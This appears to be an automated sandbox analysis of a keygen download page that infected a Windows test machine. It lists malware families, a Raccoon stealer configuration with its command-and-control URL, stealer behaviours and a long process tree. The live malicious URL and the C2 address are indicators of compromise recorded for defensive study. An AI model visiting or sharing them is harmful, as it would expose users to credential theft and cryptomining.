Analysis

  • max time kernel
    1796s
  • max time network
    1801s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    18-04-2021 17:27

General

  • Target

    https://keygenit.com/d/3563ee088d1n7s312q6.html

  • Sample

    210418-bdbbr7kjy2

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 32 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 13 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1276
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1436
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1900
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2360
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2372
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
              • Modifies registry class
              PID:2524
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
                PID:2688
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2508
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1344
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1092
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/3563ee088d1n7s312q6.html
                    1⤵
                    • Enumerates system info in registry
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of WriteProcessMemory
                    PID:580
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffa25a04f50,0x7ffa25a04f60,0x7ffa25a04f70
                      2⤵
                        PID:912
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1632 /prefetch:2
                        2⤵
                          PID:752
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1680 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4036
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2240 /prefetch:8
                          2⤵
                            PID:2556
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2932 /prefetch:1
                            2⤵
                              PID:2188
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2940 /prefetch:1
                              2⤵
                                PID:396
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
                                2⤵
                                  PID:1244
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
                                  2⤵
                                    PID:2144
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
                                    2⤵
                                      PID:2212
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
                                      2⤵
                                        PID:4112
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4808 /prefetch:8
                                        2⤵
                                          PID:4272
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 /prefetch:8
                                          2⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:4624
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5456 /prefetch:8
                                          2⤵
                                            PID:4720
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5772 /prefetch:8
                                            2⤵
                                              PID:4772
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6052 /prefetch:8
                                              2⤵
                                                PID:4816
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6188 /prefetch:8
                                                2⤵
                                                  PID:4916
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6160 /prefetch:8
                                                  2⤵
                                                    PID:4956
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6176 /prefetch:8
                                                    2⤵
                                                      PID:4992
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6180 /prefetch:8
                                                      2⤵
                                                        PID:5004
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7016 /prefetch:8
                                                        2⤵
                                                          PID:5064
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6916 /prefetch:8
                                                          2⤵
                                                            PID:5076
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7104 /prefetch:8
                                                            2⤵
                                                              PID:2344
                                                            • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                              "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                              2⤵
                                                                PID:4120
                                                                • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff64555a890,0x7ff64555a8a0,0x7ff64555a8b0
                                                                  3⤵
                                                                    PID:4280
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5800 /prefetch:8
                                                                  2⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:1136
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5852 /prefetch:8
                                                                  2⤵
                                                                    PID:1016
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5812 /prefetch:8
                                                                    2⤵
                                                                      PID:4388
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5972 /prefetch:8
                                                                      2⤵
                                                                        PID:4572
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5724 /prefetch:8
                                                                        2⤵
                                                                          PID:4580
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6680 /prefetch:8
                                                                          2⤵
                                                                            PID:4612
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6708 /prefetch:8
                                                                            2⤵
                                                                              PID:4668
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6744 /prefetch:8
                                                                              2⤵
                                                                                PID:4736
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6768 /prefetch:8
                                                                                2⤵
                                                                                  PID:4796
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6648 /prefetch:8
                                                                                  2⤵
                                                                                    PID:4596
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6668 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4876
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7200 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4996
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7336 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4992
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7324 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4132
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7580 /prefetch:8
                                                                                            2⤵
                                                                                              PID:5064
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7576 /prefetch:8
                                                                                              2⤵
                                                                                                PID:4276
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7876 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:1264
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7728 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:4512
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8140 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:5016
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8128 /prefetch:8
                                                                                                      2⤵
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:5048
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8296 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4156
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8416 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:4784
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8556 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:4272
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8692 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:4816
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8828 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:4812
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8948 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:5092
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9068 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:4676
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9088 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:5024
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9112 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:5132
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:1
                                                                                                                        2⤵
                                                                                                                          PID:5228
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
                                                                                                                          2⤵
                                                                                                                            PID:5260
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8264 /prefetch:1
                                                                                                                            2⤵
                                                                                                                              PID:5348
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
                                                                                                                              2⤵
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:5432
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
                                                                                                                              2⤵
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:5476
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2560 /prefetch:8
                                                                                                                              2⤵
                                                                                                                                PID:5520
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=772 /prefetch:8
                                                                                                                                2⤵
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:5536
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9260 /prefetch:8
                                                                                                                                2⤵
                                                                                                                                  PID:5720
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,8117852376294988252,15969524679987454385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5296 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                    PID:5796
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                  1⤵
                                                                                                                                    PID:1032
                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                    1⤵
